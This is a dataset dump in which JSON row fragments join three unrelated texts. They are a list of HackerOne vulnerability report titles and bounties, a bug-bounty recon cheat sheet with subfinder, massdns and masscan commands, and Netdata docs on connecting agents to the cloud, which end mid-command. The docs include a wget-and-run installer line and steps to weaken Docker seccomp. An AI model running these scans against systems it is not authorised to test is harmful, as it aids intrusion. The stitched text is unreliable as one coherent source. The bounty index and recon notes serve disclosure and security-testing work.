paid\nnull\n\n\n---\n\n\n### Title\nOption method enabled in kartpay Webservers\n#### URL \nhttps://hackerone.com/reports/642862\n#### Severity score\nnull\n#### Reporter \nlollol1\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGetGlobalAchievementPercentagesForApp is missing the same release checks as GetSchemaForGame\n#### URL \nhttps://hackerone.com/reports/541020\n#### Severity score\n6.8\n#### Reporter \nxpaw\n### Bounty paid\n$1,650\n\n\n---\n\n\n### Title\nServer Side Request Forgery in macro creation\n#### URL \nhttps://hackerone.com/reports/50537\n#### Severity score\nnull\n#### Reporter \nhaquaman\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPhpinfo\n#### URL \nhttps://hackerone.com/reports/521582\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBrave payments remembers history even after clearing all browser data.\n#### URL \nhttps://hackerone.com/reports/203088\n#### Severity score\n2.1\n#### Reporter \nsumit\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/184076\n#### Severity score\nnull\n#### Reporter \ntsug0d\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBadoo and Hotornot User Disclosure\n#### URL \nhttps://hackerone.com/reports/130453\n#### Severity score\nnull\n#### Reporter \nsymbiansymoh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ninformation disclosure (LOAD BALANCER + URI XSS)\n#### URL \nhttps://hackerone.com/reports/8284\n#### Severity score\nnull\n#### Reporter \nnnwakelam\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nArbitary file download vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/186326\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of Email title report in quick award paypout email (no content mode)\n#### URL \nhttps://hackerone.com/reports/689997\n#### Severity score\nnull\n#### Reporter \nkunal94\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nUsing GET method for account login with CSRF token leaking to external sites Via Referer.\n#### URL \nhttps://hackerone.com/reports/76733\n#### Severity score\nnull\n#### Reporter \nbugs3ra\n### Bounty paid\n$25\n\n\n---\n\n\n### Title\nWordpress Version Disclosure Bug On Nextcloud\n#### URL \nhttps://hackerone.com/reports/188132\n#### Severity score\nnull\n#### Reporter \ncr4zyrud\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nBypass fix in https://hackerone.com/reports/151516 report.\n#### URL \nhttps://hackerone.com/reports/160520\n#### Severity score\nnull\n#### Reporter \n0x01alka\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation Disclosure (Directory Structure)\n#### URL \nhttps://hackerone.com/reports/7930\n#### Severity score\nnull\n#### Reporter \nrajuraju14\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMetadata in hosted files is disclosing Usernames, Printers, paths, admin guides. emails\n#### URL \nhttps://hackerone.com/reports/36586\n#### Severity score\nnull\n#### Reporter \njmiroche\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nhttp://conf.member.yahoo.com configuration file disclosure\n#### URL \nhttps://hackerone.com/reports/2598\n#### Severity score\nnull\n#### Reporter \nnnwakelam\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nFull path disclosure at https://keybase.io/_/api/1.0/invitation_request.json\n#### URL \nhttps://hackerone.com/reports/77319\n#### Severity score\nnull\n#### Reporter \ns_p_q_r\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nInformation disclosure (system username) in the x-amz-meta-s3cmd-attrs response header on federation.data.gov\n#### URL \nhttps://hackerone.com/reports/262649\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\n[www.werkenbijbakertilly.nl] Information Disclosure\n#### URL \nhttps://hackerone.com/reports/892610\n#### Severity score\nnull\n#### Reporter \nwhat_web\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nInformation disclosure with sensitive data\n#### URL \nhttps://hackerone.com/reports/703600\n#### Severity score\n6.1\n#### Reporter \nmickey01\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nClient secret, server tokens for developer applications returned by internal API\n#### URL \nhttps://hackerone.com/reports/419655\n#### Severity score\nnull\n#### Reporter \nanandprakash_\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\nHistory Disclosure of MS-Dos\n#### URL \nhttps://hackerone.com/reports/5549\n#### Severity score\nnull\n#### Reporter \nsiddiki\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of Program email Title Report when being removed as contributor. Bypass for Report #645264\n#### URL \nhttps://hackerone.com/reports/669776\n#### Severity score\n3.4\n#### Reporter \nhisokamorou\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nView Any Program's Team Members through GET https://hackerone.com/invitations/\n#### URL \nhttps://hackerone.com/reports/283014\n#### Severity score\nnull\n#### Reporter \nnickcas\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nMultiple issues in Libxml2 (2.9.2 - 2.9.5)\n#### URL \nhttps://hackerone.com/reports/293126\n#### Severity score\n5.4\n#### Reporter \nxixabangm4\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Leak - GitHub - Endpoint Configuration Details\n#### URL \nhttps://hackerone.com/reports/378558\n#### Severity score\nnull\n#### Reporter \npeuch\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndon't leak server version of grtp.co in error pages\n#### URL \nhttps://hackerone.com/reports/136720\n#### Severity score\nnull\n#### Reporter \ndotnick\n### Bounty paid\n$1\n\n\n---\n\n\n### Title\nInternal Hostname disclosure from multiple Apache servers via blank host header method\n#### URL \nhttps://hackerone.com/reports/548094\n#### Severity score\nnull\n#### Reporter \njackb898\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nInvitation tokens leak to Google Analytics\n#### URL \nhttps://hackerone.com/reports/237262\n#### Severity score\n3.1\n#### Reporter \nh33t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nvidyard api auth_token exposed\n#### URL \nhttps://hackerone.com/reports/878434\n#### Severity score\nnull\n#### Reporter \nstilou\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUser credentials are sent in clear text\n#### URL \nhttps://hackerone.com/reports/7950\n#### Severity score\nnull\n#### Reporter \nashesh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNode modules path disclosure due to lack of error handling\n#### URL \nhttps://hackerone.com/reports/225537\n#### Severity score\nnull\n#### Reporter \napapedulimu\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nHost header poisoning leads to account password reset links hijacking\n#### URL \nhttps://hackerone.com/reports/167631\n#### Severity score\nnull\n#### Reporter \nyassineaboukir\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPotential linkage of public/private (anonymous) node addresses\n#### URL \nhttps://hackerone.com/reports/766963\n#### Severity score\nnull\n#### Reporter \nahook\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOpen SonarQube instance leaking internal source code\n#### URL \nhttps://hackerone.com/reports/947946\n#### Severity score\nnull\n#### Reporter \naksquare\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTeam object in GraphQL disclosed total number of whitelisted hackers\n#### URL \nhttps://hackerone.com/reports/342978\n#### Severity score\n5\n#### Reporter \nhaxta4ok00\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\nSMTP Failure Leads to Chain of Internal System Failure\n#### URL \nhttps://hackerone.com/reports/642488\n#### Severity score\nnull\n#### Reporter \nbb00x\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nleak receipt of another user\n#### URL \nhttps://hackerone.com/reports/61371\n#### Severity score\nnull\n#### Reporter \nadrianbelen\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nInformation Leak - Github - JMS Information\n#### URL \nhttps://hackerone.com/reports/360811\n#### Severity score\nnull\n#### Reporter \npeuch\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nreport id is exposed for undisclosed reports in Hacktivity\n#### URL \nhttps://hackerone.com/reports/493484\n#### Severity score\nnull\n#### Reporter \n0619\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure\n#### URL \nhttps://hackerone.com/reports/7972\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nWordpress Users Disclosure\n#### URL \nhttps://hackerone.com/reports/625199\n#### Severity score\nnull\n#### Reporter \nabay\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPotentially sensitive information disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/207236\n#### Severity score\nnull\n#### Reporter \nscraps\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nСмотрим фотографии из частных/закрытых групп.\n#### URL \nhttps://hackerone.com/reports/321594\n#### Severity score\nnull\n#### Reporter \nexecutor\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nNginx Version Disclosure\n#### URL \nhttps://hackerone.com/reports/214570\n#### Severity score\nnull\n#### Reporter \nlulliii\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nH1514 [beerify.shopifycloud.com] GraphQL discloses internal beer consumption\n#### URL \nhttps://hackerone.com/reports/419883\n#### Severity score\nnull\n#### Reporter \nemitrani\n### Bounty paid\n$802.20\n\n\n---\n\n\n### Title\nInformation disclosure at https://printshop.engelvoelkers.com/packages/.bash_history\n#### URL \nhttps://hackerone.com/reports/890285\n#### Severity score\n3.7\n#### Reporter \ncarambax\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nStealing livechat token and using it to chat as the user - user information disclosure \n#### URL \nhttps://hackerone.com/reports/151058\n#### Severity score\nnull\n#### Reporter \nzombiehelp54\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nInformation disclousure by clicking on the link shown in http://████████/\n#### URL \nhttps://hackerone.com/reports/708019\n#### Severity score\nnull\n#### Reporter \npirateducky\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUsers with member privilege are able to see emails and membership information of other users\n#### URL \nhttps://hackerone.com/reports/244781\n#### Severity score\nnull\n#### Reporter \nhackedbrain\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAccess to all files of remote user through shared file\n#### URL \nhttps://hackerone.com/reports/258084\n#### Severity score\n6.8\n#### Reporter \nxuesheng\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/197055\n#### Severity score\nnull\n#### Reporter \nsp1d3rs\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n\"Bounties paid in the last 90 days\" discloses the undisclosed bounty amount in program statistics\n#### URL \nhttps://hackerone.com/reports/696266\n#### Severity score\n3.8\n#### Reporter \njapz\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nScrollbar Width permits detecting browser platform\n#### URL \nhttps://hackerone.com/reports/252580\n#### Severity score\nnull\n#### Reporter \nhackerfactor\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nVulnerable Javascript library\n#### URL \nhttps://hackerone.com/reports/145517\n#### Severity score\nnull\n#### Reporter \npaulochoupina\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nProgram profile metrics endpoint contains mean time to triage, even when turned off\n#### URL \nhttps://hackerone.com/reports/289568\n#### Severity score\n5\n#### Reporter \nflashdisk\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nCredential gets exposed\n#### URL \nhttps://hackerone.com/reports/255132\n#### Severity score\nnull\n#### Reporter \nluke081515\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation Disclosure \n#### URL \nhttps://hackerone.com/reports/1091\n#### Severity score\nnull\n#### Reporter \nnahamsec\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPartial PII leakage due to public set gitlab\n#### URL \nhttps://hackerone.com/reports/375091\n#### Severity score\nnull\n#### Reporter \nalyssa_herrera\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nTeam object exposes amount of participants in a private program to non-invited users\n#### URL \nhttps://hackerone.com/reports/380317\n#### Severity score\n4.4\n#### Reporter \nkapytein\n### Bounty paid\n$5,000\n\n\n---\n\n\n### Title\nH1514 Deanonymizing Exchange Marketplace private listings \n#### URL \nhttps://hackerone.com/reports/421009\n#### Severity score\n5.3\n#### Reporter \nfisher\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nОткрытые сорцы \n#### URL \nhttps://hackerone.com/reports/518081\n#### Severity score\n0\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nThe web application https://mavenlink.com discloses version details of the underlying Platform / Server\n#### URL \nhttps://hackerone.com/reports/14529\n#### Severity score\nnull\n#### Reporter \nblackb0xl33t\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure via policy update notifications after removal from program\n#### URL \nhttps://hackerone.com/reports/177484\n#### Severity score\n3.5\n#### Reporter \nstaytuned\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nImage Injection vulnerability on screenshot-viewer/responsive/image may allow Facebook OAuth token theft.\n#### URL \nhttps://hackerone.com/reports/655288\n#### Severity score\nnull\n#### Reporter \nnetfuzzer\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nРаскрытие серии/номера паспорта и снилс пользователя lootdog.io\n#### URL \nhttps://hackerone.com/reports/356322\n#### Severity score\n3.4\n#### Reporter \ncircuit\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\ninvite1.us2.msg.vip.bf1.yahoo.com/ - CSRF/email disclosure\n#### URL \nhttps://hackerone.com/reports/7608\n#### Severity score\nnull\n#### Reporter \nnnwakelam\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nInformation Disclosure That shows the webroot of CoinBase Server\n#### URL \nhttps://hackerone.com/reports/5073\n#### Severity score\nnull\n#### Reporter \nmazen160\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nThe special code in editor has no Authority control and can lead to Information Disclosure\n#### URL \nhttps://hackerone.com/reports/221950\n#### Severity score\nnull\n#### Reporter \nxifengweiyu\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSensitive information contained with New Relic APM iOS application\n#### URL \nhttps://hackerone.com/reports/130739\n#### Severity score\nnull\n#### Reporter \ntodayisnew\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nExposes a series of other private credentials\n#### URL \nhttps://hackerone.com/reports/289189\n#### Severity score\nnull\n#### Reporter \n4w3\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull access to Amazon S3 bucket containing AWS CloudTrail logs\n#### URL \nhttps://hackerone.com/reports/111643\n#### Severity score\nnull\n#### Reporter \nkoenrh\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nUnauthorized access to metadata of undisclosed reports that were retested\n#### URL \nhttps://hackerone.com/reports/871749\n#### Severity score\n5\n#### Reporter \nmsdian7\n### Bounty paid\n$2,500\n\n\n---\n\n\n### Title\n[online.games.mail.ru] - Sensitive information disclosure\n#### URL \nhttps://hackerone.com/reports/317980\n#### Severity score\nnull\n#### Reporter \ngodex\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nTeam object in GraphQL that have a published external program may expose existence of a private program\n#### URL \nhttps://hackerone.com/reports/347937\n#### Severity score\nnull\n#### Reporter \nnismo\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCSS leaks SCSS debug info\n#### URL \nhttps://hackerone.com/reports/2221\n#### Severity score\nnull\n#### Reporter \nguido\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nAccess to multiple production Grafana dashboards\n#### URL \nhttps://hackerone.com/reports/663628\n#### Severity score\nnull\n#### Reporter \ndamian89\n### Bounty paid\n$10,000\n\n\n---\n\n\n### Title\nIDOR - Folder names disclosure inside a domain, regardless of user\n#### URL \nhttps://hackerone.com/reports/194574\n#### Severity score\nnull\n#### Reporter \ninhibitor181\n### Bounty paid\n$250\n\n\n---\n\n\n### Title\nContacts menu (not app) fails to restrict (to local groups) for contacts from federated servers\n#### URL \nhttps://hackerone.com/reports/895730\n#### Severity score\n3.2\n#### Reporter \nnursoda\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUsername&password is Disclosure in readme file in [https://█████████]\n#### URL \nhttps://hackerone.com/reports/804980\n#### Severity score\nnull\n#### Reporter \nyghonem\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCache-Control Misconfiguration Leads to Sensitive Information Leakage\n#### URL \nhttps://hackerone.com/reports/132835\n#### Severity score\nnull\n#### Reporter \ngeekboy\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSharePoint exposed web services\n#### URL \nhttps://hackerone.com/reports/300540\n#### Severity score\nnull\n#### Reporter \nlinkks\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPublic calendar link can be invisible\n#### URL \nhttps://hackerone.com/reports/246055\n#### Severity score\nnull\n#### Reporter \nfaisal2542\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nLast build status and coverage leaked to unauthorized users\n#### URL \nhttps://hackerone.com/reports/477222\n#### Severity score\nnull\n#### Reporter \nxanbanx\n### Bounty paid\n$750\n\n\n---\n\n\n### Title\n[opensource.mail.ru] Debug Mode\n#### URL \nhttps://hackerone.com/reports/99054\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nDisclosure of personal support email addresses on 'support-fleet.city-mobil.ru'\n#### URL \nhttps://hackerone.com/reports/950485\n#### Severity score\nnull\n#### Reporter \nolidayw\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nApache documentation\n#### URL \nhttps://hackerone.com/reports/90321\n#### Severity score\nnull\n#### Reporter \nba4fe4ca95021d367f8a574\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPath Disclosure Vulnerability\n#### URL \nhttps://hackerone.com/reports/11729\n#### Severity score\nnull\n#### Reporter \njamalcom\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nConfiguartion [Sensitive] Information Disclosure\n#### URL \nhttps://hackerone.com/reports/774872\n#### Severity score\nnull\n#### Reporter \nbarsainya\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUnupdated ImageMagic leads to uninitialized server memory disclosure \n#### URL \nhttps://hackerone.com/reports/274594\n#### Severity score\nnull\n#### Reporter \nchaosbolt\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nAccess MoPub Reports Data even after Company removed you from their MoPub Account.\n#### URL \nhttps://hackerone.com/reports/399174\n#### Severity score\nnull\n#### Reporter \nsuyog\n### Bounty paid\n$140\n\n\n---\n\n\n### Title\nWeb cache deception attack on https://open.vanillaforums.com/messages/all\n#### URL \nhttps://hackerone.com/reports/593712\n#### Severity score\n4.3\n#### Reporter \nronr\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nDjango debug enabled showing information about system, database, configuration files.\n#### URL \nhttps://hackerone.com/reports/963164\n#### Severity score\nnull\n#### Reporter \nvbdev\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFull Path Disclosure\n#### URL \nhttps://hackerone.com/reports/115337\n#### Severity score\nnull\n#### Reporter \nsupernatural\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nRead files on application server, leads to RCE\n#### URL \nhttps://hackerone.com/reports/178152\n#### Severity score\n9\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nProfile Pic padding (Length-hiding) fails due to use of GZIP\n#### URL \nhttps://hackerone.com/reports/29835\n#### Severity score\nnull\n#### Reporter \nericlaw\n### Bounty paid\n$280\n\n\n---\n\n\n### Title\nVerification of email addresses possible through https://www.yelp.com/signup/facebook\n#### URL \nhttps://hackerone.com/reports/194721\n#### Severity score\nnull\n#### Reporter \ncoder13\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\n[info.tmgame.mail.ru] Apache Server Status\n#### URL \nhttps://hackerone.com/reports/388746\n#### Severity score\nnull\n#### Reporter \nbobrov\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nGetting Error Message and in use python version 2.7 is exposed.\n#### URL \nhttps://hackerone.com/reports/128041\n#### Severity score\nnull\n#### Reporter \nniputiwari\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[allods.my.com] Full SQL Disclosure\n#### URL \nhttps://hackerone.com/reports/97317\n#### Severity score\nnull\n#### Reporter \nbigbear_\n### Bounty paid\nnull\n\n\n---\n\n\n"}}},{"rowIdx":544,"cells":{"text":{"kind":"string","value":"# BugBounty\nCheat Sheets, Methodologies etc.\n\n\n## Subdomain Scraping\n\n### Subfinder\n\n[https://github.com/ice3man543/subfinder](https://github.com/ice3man543/subfinder)\n\n`subfinder -d domain.name -o /path/to/output`\n\n\n## DNS Resolving\n\n### MassDNS\n\n[https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns)\n\n`massdns -r ./massdns/lists/resolvers.txt -t A -o S /path/to/subfinderoutput > /path/to/output`\n\nGet uniq IPs:\n\n`cat /path/to/massdnsoutput | grep -E \"A \" | sed 's/.*A //' | sort | uniq > UniqIPs.txt`\n\n## Port Scanning\n\n### Masscan\n\n[https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan)\n\n`masscan -iL UniqIPs.txt -p --rate > /path/to/output`\n"}}},{"rowIdx":545,"cells":{"text":{"kind":"string","value":"\n\n# Connect Agent to Cloud\n\nYou can securely connect a Netdata Agent, running on a distributed node, to Netdata Cloud. A Space's\nadministrator creates a **claiming token**, which is used to add an Agent to their Space via the [Agent-Cloud link\n(ACLK)](/aclk/README.md).\n\nAre you just starting out with Netdata Cloud? See our [get started with\nCloud](https://learn.netdata.cloud/docs/cloud/get-started) guide for a walkthrough of the process and simplified\ninstructions.\n\nWhen connecting an agent (also referred to as a node) to Netdata Cloud, you must complete a verification process that proves you have some level of authorization to manage the node itself. This verification is a security feature that helps prevent unauthorized users from seeing the data on your node.\n\nOnly the administrators of a Space in Netdata Cloud can view the claiming token and accompanying script generated by\nNetdata Cloud.\n\n> The connection process ensures no third party can add your node, and then view your node's metrics, in a Cloud account,\n> Space, or War Room that you did not authorize.\n\nBy connecting a node, you opt-in to sending data from your Agent to Netdata Cloud via the [ACLK](/aclk/README.md). This\ndata is encrypted by TLS while it is in transit. We use the RSA keypair created during the connection process to authenticate the\nidentity of the Netdata Agent when it connects to the Cloud. While the data does flow through Netdata Cloud servers on its way\nfrom Agents to the browser, we do not store or log it.\n\nYou can connect a node during the Netdata Cloud onboarding process, or after you created a Space by clicking on **Connect\nNodes** in the [Spaces management area](https://learn.netdata.cloud/docs/cloud/spaces#manage-spaces).\n\nThere are two important notes regarding connecting nodes:\n\n- _You can only connect any given node in a single Space_. You can, however, add that connected node to multiple War Rooms\n within that one Space.\n- You must repeat the connection process on every node you want to add to Netdata Cloud.\n\n## How to connect a node\n\nThere will be three main flows from where you might want to connect a node to Netdata Cloud.\n* when you are on an [\nWar Room](#empty-war-room) and you want to connect your first node\n* when you are at the [Manage Space](#manage-space-or-war-room) area and you select **Connect Nodes** to connect a node, coming from Manage Space or Manage War Room\n* when you are on the [Nodes view page](https://learn.netdata.cloud/docs/cloud/visualize/nodes) and want to connect a node - this process falls into the [Manage Space](#manage-space-or-war-room) flow\n\nPlease note that only the administrators of a Space in Netdata Cloud can view the claiming token and accompanying script, generated by Netdata Cloud, to trigger the connection process.\n\n### Empty War Room\n\nEither at your first sign in or following ones, when you enter Netdata Cloud and are at a War Room that doesn’t have any node added to it, you will be able to:\n* connect a new node to Netdata Cloud and add it to the War Room \n* add a previously connected node to the War Room \n\nIf your case is to connect a new node and add it to the War Room, you will need to tell us what environment the node is running on (Linux, Docker, macOS, Kubernetes) and then we will provide you with a script to initiate the connection process. You just will need to copy and paste it into your node's terminal. See one of the following sections depending on your case:\n* [Linux](#connect-an-agent-running-in-linux)\n* [Docker](#connect-an-agent-running-in-docker)\n* [macOS](#connect-an-agent-running-in-macos)\n* [Kubernetes](#connect-a-kubernetes-clusters-parent-netdata-pod)\n\nRepeat this process with every node you want to add to Netdata Cloud during onboarding. You can also add more nodes once you've\nfinished onboarding.\n\n### Manage Space or War Room\n\nTo connect a node, select which War Rooms you want to add this node to with the dropdown, then copy and paste the script\ngiven by Netdata Cloud into your node's terminal.\n\nWhen coming from [Nodes view page](https://learn.netdata.cloud/docs/cloud/visualize/nodes) the room parameter is already defined to current War Room.\n\n### Connect an agent running in Linux\n\nIf you want to connect a node that is running on a Linux environment, the script that will be provided to you by Netdata Cloud is the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) which will install the Netdata Agent on your node, if it isn't already installed, and connect the node to Netdata Cloud. It should be similar to:\n\n```\nwget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud\n```\nThe script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if you don't see\nthe node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).\n\nPlease note that to run it you will either need to have root privileges or run it with the user that is running the agent, more details on the [Connect an agent without root privileges](#connect-an-agent-without-root-privileges) section.\n\nFor more details on what are the extra parameters `claim-token`, `claim-rooms` and `claim-url` please refer to [Connect node to Netdata Cloud during installation](/packaging/installer/methods/kickstart.md#connect-node-to-netdata-cloud-during-installation).\n\n### Connect an agent without root privileges\n\nIf you don't want to run the installation script to connect your nodes to Netdata Cloud with root privileges, you can discover which user is running the Agent,\nswitch to that user, and run the script.\n\nUse `grep` to search your `netdata.conf` file, which is typically located at `/etc/netdata/netdata.conf`, for the `run\nas user` setting. For example:\nTo connect a node, select which War Rooms you want to add this node to with the dropdown, then copy and paste the script\ngiven by Netdata Cloud into your node's terminal.\n\n```bash\ngrep \"run as user\" /etc/netdata/netdata.conf \n # run as user = netdata\n```\n\nThe default user is `netdata`. Yours may be different, so pay attention to the output from `grep`. Switch to that user\nand run the script.\n\n```bash\nwget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud\n```\n### Connect an agent running in Docker\n\nTo connect an instance of the Netdata Agent running inside of a Docker container, it is recommended that you follow\nthe instructions and use the commands provided either in the `Nodes` tab of an [empty War Room](#empty-war-room) on Netdata Cloud or \nin the shelf that appears when you click **Connect Nodes** and select **Docker**. \n\nHowever, users can also claim a new node by claiming environment variables in the container to have it automatically \nconnected on startup or restart.\n\nFor the connection process to work, the contents of `/var/lib/netdata` _must_ be preserved across container\nrestarts using a persistent volume. See our [recommended `docker run` and Docker Compose\nexamples](/packaging/docker/README.md#create-a-new-netdata-agent-container) for details.\n\n#### Known issues on older hosts with seccomp enabled\n\nThe nodes running on the following hosts **cannot be claimed**:\n\n- `libseccomp` version less than v2.3.3.\n- Docker version less than v18.04.0-ce.\n- The kernel is configured with CONFIG_SECCOMP enabled.\n\nTo check if your kernel supports `seccomp`:\n\n```cmd\n# grep CONFIG_SECCOMP= /boot/config-$(uname -r) 2>/dev/null || zgrep CONFIG_SECCOMP /proc/config.gz 2>/dev/null\nCONFIG_SECCOMP=y\n```\n\nTo resolve the issue, do one of the following actions:\n\n- Update to a newer version of Docker and `libseccomp` (recommended).\n- Create a custom profile and pass it for the container.\n- Run [without the default seccomp profile](https://docs.docker.com/engine/security/seccomp/#run-without-the-default-seccomp-profile) (unsafe, not recommended).\n\n
\nSee how to create a custom profile\n\n1. Download the moby default seccomp profile and change `defaultAction` to `SCMP_ACT_TRACE` on line 2.\n\n ```cmd\n sudo wget https://raw.githubusercontent.com/moby/moby/master/profiles/seccomp/default.json -O /etc/docker/seccomp.json\n sudo sed -i '2s/SCMP_ACT_ERRNO/SCMP_ACT_TRACE/' /etc/docker/seccomp.json\n ```\n\n2. Specify the new policy for the container explicitly.\n\n - When using `docker run`:\n\n ```cmd\n docker run -d --name=netdata \\\n --security-opt=seccomp=/etc/docker/seccomp.json \\\n ...\n ```\n\n - When using `docker-compose`:\n\n > :warning: The security_opt option is ignored when deploying a stack in swarm mode.\n\n ```yaml\n version: '3'\n services:\n netdata:\n security_opt:\n - seccomp:/etc/docker/seccomp.json\n ...\n ```\n\n - When using `docker stack deploy`:\n\n Change the default profile globally by adding `--seccomp-profile=/etc/docker/seccomp.json` to the options passed to\n dockerd on startup.\n\n
\n\n#### Using environment variables\n\nThe Netdata Docker container looks for the following environment variables on startup:\n\n- `NETDATA_CLAIM_TOKEN`\n- `NETDATA_CLAIM_URL`\n- `NETDATA_CLAIM_ROOMS`\n- `NETDATA_CLAIM_PROXY`\n\nIf the token and URL are specified in their corresponding variables _and_ the container is not already connected,\nit will use these values to attempt to connect the container, automatically adding the node to the specified War\nRooms. If a proxy is specified, it will be used for the connection process and for connecting to Netdata Cloud.\n\nThese variables can be specified using any mechanism supported by your container tooling for setting environment\nvariables inside containers. \n\nWhen using the `docker run` command, if you have an agent container already running, it is important to know that there will be a short period of downtime. This is due to the process of recreating the new agent container.\n\nThe command to connect a new node to Netdata Cloud is:\n\n```bash \ndocker run -d --name=netdata \\\n -p 19999:19999 \\\n -v netdataconfig:/etc/netdata \\\n -v netdatalib:/var/lib/netdata \\\n -v netdatacache:/var/cache/netdata \\\n -v /etc/passwd:/host/etc/passwd:ro \\\n -v /etc/group:/host/etc/group:ro \\\n -v /proc:/host/proc:ro \\\n -v /sys:/host/sys:ro \\\n -v /etc/os-release:/host/etc/os-release:ro \\\n --restart unless-stopped \\\n --cap-add SYS_PTRACE \\\n --security-opt apparmor=unconfined \\\n -e NETDATA_CLAIM_TOKEN=TOKEN \\\n -e NETDATA_CLAIM_URL=\"https://api.netdata.cloud\" 